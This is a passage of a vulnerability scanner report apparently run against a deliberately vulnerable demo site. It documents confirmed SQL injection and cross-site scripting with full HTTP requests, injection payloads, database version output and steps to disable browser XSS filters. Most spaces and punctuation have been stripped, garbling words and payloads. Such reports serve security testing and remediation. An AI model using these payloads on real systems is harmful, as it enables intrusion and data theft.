ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST ) WAITFOR DELAY 0025--
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 68Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=27)+WAITFOR+DELAY+2703a03a2527--
ResponseHTTP11 201 CreatedCache-Control no-cacheDate Mon 25 Aug 2014 232122 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 0Expires -1
9 57
5 TOTALCRITICAL
CONFIRMED
5
2 SQL InjectionNetsparkeridentifiedanSQLinjectionwhichoccurswhendatainputbyauserisinterpretedasanSQLcommandratherthanasnormaldatabythebackenddatabase
Thisisanextremelycommonvulnerabilityanditssuccessfulexploitationcanhavecriticalimplications
NetsparkerconfirmedthevulnerabilitybyexecutingatestSQLqueryonthebackenddatabase
ImpactDependingonthebackenddatabasethedatabaseconnectionsettingsandtheoperatingsystemanattackercanmountoneormoreofthefollowingtypeofattackssuccessfully
ReadingupdatinganddeletingarbitrarydataortablesfromthedatabaseExecutingcommandsontheunderlyingoperatingsystem
Actions to Take1 Seetheremedyforsolution2 Ifyouarenotusingadatabaseaccesslayer(DAL)considerusingoneThiswillhelpyoucentralizetheissueYoucanalsouseORM(object relational mapping)MostoftheORMsystemsuseonlyparameterizedqueriesandthiscansolvethewholeSQLinjectionproblem
3 LocateallofthedynamicallygeneratedSQLqueriesandconvertthemtoparameterizedqueries(If you decide to use a DALORM changeall legacy code to use these new libraries)
4 Useyourweblogsandapplicationlogstoseeiftherewereanypreviousbutundetectedattackstothisresource
RemedyArobustmethodformitigatingthethreatofSQLinjection-basedvulnerabilitiesistouseparameterizedqueries(prepared statements)Almostallmodernlanguagesprovidebuilt-inlibrariesforthisWhereverpossibledonotcreatedynamicSQLqueriesorSQLquerieswithstringconcatenation
Required Skills for Successful ExploitationTherearenumerousfreelyavailabletoolstoexploitSQLinjectionvulnerabilitiesThisisacomplexareawithmanydependencieshoweveritshouldbenotedthatthenumerousresourcesavailableinthisareahaveraisedbothattackerawarenessoftheissuesandtheirabilitytodiscoverandleveragethemSQLinjectionisoneofthemostcommonwebapplicationvulnerabilities
External ReferencesOWASPSQLinjectionSQLinjectionCheatsheet
Remedy ReferencesMSDN-ProtectFromSQLinjectioninASPNET
ClassificationOWASP2010-A1OWASP2013-A1PCIV20-651PCIV30-651CWE-89CAPEC-66WASC-19
21 apivote CONFIRMEDhttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101) C
Extracted Datamicrosoft sql azure (rtm) - 110922217 ntaug 20 2014 223756 ntcopyright (c) microsoft corporationn
10 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 209Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=272b+(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns)+2b27
ResponsehellipPNETContent-Length 2867Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageConversion failed when converting the varchar value _2dilemma to data typeintExceptionTypeSystemDataSqlClientSqlExceptionStackTrace at SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnectionAction`1 wraphellip
22 SupercarLeaderboard CONFIRMEDhttphackyourselffirsttroyhuntcomSupercarLeaderboardorderBy=(select+convert(int2cCHAR(95)2b
ParametersParameter Type Value
orderBy GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
asc GET false
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET SupercarLeaderboardorderBy=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns)ampasc=false HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept texthtmlapplicationxhtml+xmlapplicationxmlq=09imagewebpq=08Referer httphackyourselffirsttroyhuntcomSupercarLeaderboardAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
11 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14292Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
23 Make2 CONFIRMEDhttphackyourselffirsttroyhuntcomMake2orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make2orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
12 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
24 Make3 CONFIRMEDhttphackyourselffirsttroyhuntcomMake3orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make3orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
13 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
25 Make1 CONFIRMEDhttphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
14 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
15 57
1 TOTALIMPORTANT
CONFIRMED
1
3 Cross-site ScriptingNetsparkerdetectedcross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScript VBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofcross-sitescriptingincluding
HijackingusersactivesessionMountingphishingattacksInterceptingdataandperformingman-in-the-middleattacks
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisoutputshouldbeencodedaccordingtotheoutputlocationandcontextForexampleiftheoutputgoesintoaJavaScriptblockwithintheHTMLdocumentthenoutputneedstobeencodedaccordinglyEncodingcangetverycomplexthereforeitsstronglyrecommendedtouseanencodinglibrarysuchasOWASPESAPIandMicrosoftAnti-cross-sitescripting
Remedy ReferencesMicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
Proof of Concept NotesGeneratedXSSexploitmightnotworkduetobrowserXSSfilteringPleasefollowtheguidelinesbelowinordertodisableXSSfilteringfordifferentbrowsersAlsonotethat
XSSfilteringisafeaturethatsenabledbydefaultinsomeofthemodernbrowsersItshouldonlybedisabledtemporarilytotestexploitsandshouldberevertedbackifthebrowserisactivelyusedotherthantestingpurposesEventhoughbrowsershavecertaincheckstopreventCross-sitescriptingattacksinpracticethereareavarietyofwaystobypassthismechanismthereforeawebapplicationshouldnotrelyonthiskindofclient-sidebrowserchecks
Chrome
OpencommandpromptGotofolderwherechromeexeislocatedRunthecommandchromeexe --args --disable-xss-auditor
InternetExplorer
ClickTools-gtInternetOptionsandthennavigatetotheSecurityTabClickCustomlevelandscrolltowardsthebottomwhereyouwillfindthatEnableXSSfilteriscurrentlyEnabledSetittodisabledClickOKClickYestoacceptthewarningfollowedbyApply
Firefox
GotoaboutconfigintheURLaddressbarInthesearchfieldtypeurlbarfilterandfindbrowserurlbarfilterjavascriptSetitsvaluetofalsebydoubleclickingtherow
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
16 57
31 Search CONFIRMEDhttphackyourselffirsttroyhuntcomSearchsearchTerm=2Bnetsparker(9)2B
ParametersParameter Type Value
searchTerm GET +netsparker(9)+
RequestGET SearchsearchTerm=2Bnetsparker(9)2B HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Responsehellipltsectiongtltdivgtltdivgtltdivgtltdivgtltheadergt
ltdiv class=containergtltsectiongt
lth2gtYou searched for ampquotltspan id=searchTermgt+netsparker(9)+ltspangtampquotlth2gt
ltp class=alert alert-errorgtNo results found for your searchltpgt
ltsectiongtlthrgtltfootergtltpgtampcopy 2014 - Hack Yourself Firstltpgtltfootergt
hellipgtltscriptgt
ltscriptgt$(results tr)click(function () var url = Supercar + $(this)attr(id)windowlocationhref = url)
$(searchTerm)val(+netsparker(9)+)ltscriptgt
ltscriptgt(function (i s o g r a m) i[GoogleAnalyticsObject] = r i[r] = i[r] || function () (i[r]q = i[r]q || [])push(arguments) i[rhellip
17 57
1 TOTALIMPORTANT
CONFIRMED
1
4 Permanent Cross-site ScriptingNetsparkeridentifiedpermanentcross-sitescriptingandconfirmedthisvulnerabilitybyanalyzingtheexecutionofinjectedJavaScript
PermanentXSSallowsanattackertoexecutedynamicscripts(JavaScript VBScript)inthecontextoftheapplicationThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbytheuserhasbeeninterpretedbyHTMLJavaScriptVBScriptwithinthebrowser
PermanentmeansthattheattackwillbestoredinthebackendsystemInnormalXSSattacksanattackerneedstoe-mailthevictimbutinapermanentXSSanattackercanjustexecutetheattackandwaitforuserstoseetheaffectedpageAssoonassomeonevisitsthepagetheattackersstoredpayloadwillgetexecuted
XSStargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitonlyallowsattackerstohijackotheruserssessionstheattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactPermanentXSSisadangerousissuethathasmanyexploitationvectorssomeofwhichinclude
Userssession-sensitiveinformationsuchascookiescanbestolenXSScanenableclient-sidewormswhichcouldmodifydeleteorstealotherusersdatawithintheapplicationThewebsitecanberedirectedtoanewlocationdefacedorusedasaphishingsite
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredOutputshouldbefilteredaccordingtotheoutputformatandlocationTypicallytheoutputlocationisHTMLWheretheoutputisHTMLensureallactivecontentisremovedpriortoitspresentationtotheserver
Priortosanitizinguserinputensureyouhaveapre-definedlistofbothexpectedandacceptablecharacterswithwhichyoupopulateawhitelistThislistneedsonlybedefinedonceandshouldbeusedtosanitizeandvalidateallsubsequentinput
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsgoodexamplesoftheseincludetheOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-Cross-siteScriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
41 Supercar3 CONFIRMEDhttphackyourselffirsttroyhuntcomSupercar3
Injection URLhttphackyourselffirsttroyhuntcomapivote
18 57
Injection RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 77Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=223e3cnet+sparker3dnetsparker(0x00043F)3e
Identification RequestGET Supercar3 HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Injection ResponseHTTP11 201 CreatedCache-Control no-cacheDate Mon 25 Aug 2014 232053 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 0Expires -1
Identification Responsehellip1))ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000))11))0)=1lttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgtgtltnet sparker=netsparker(0x00043F)gtlttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgt-1OR1=1)ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000)hellip
19 57
1 TOTALIMPORTANT
CONFIRMED
1
5 Password Transmitted over HTTPNetsparkerdetectedthatpassworddataisbeingtransmittedoverHTTP
ImpactIfanattackercaninterceptnetworktrafficheshecanstealuserscredentials
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformsandpagestoHTTPSanddonotservethemoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
51 AccountRegister CONFIRMEDhttphackyourselffirsttroyhuntcomAccountRegister
Form target actionhttphackyourselffirsttroyhuntcomAccountRegister
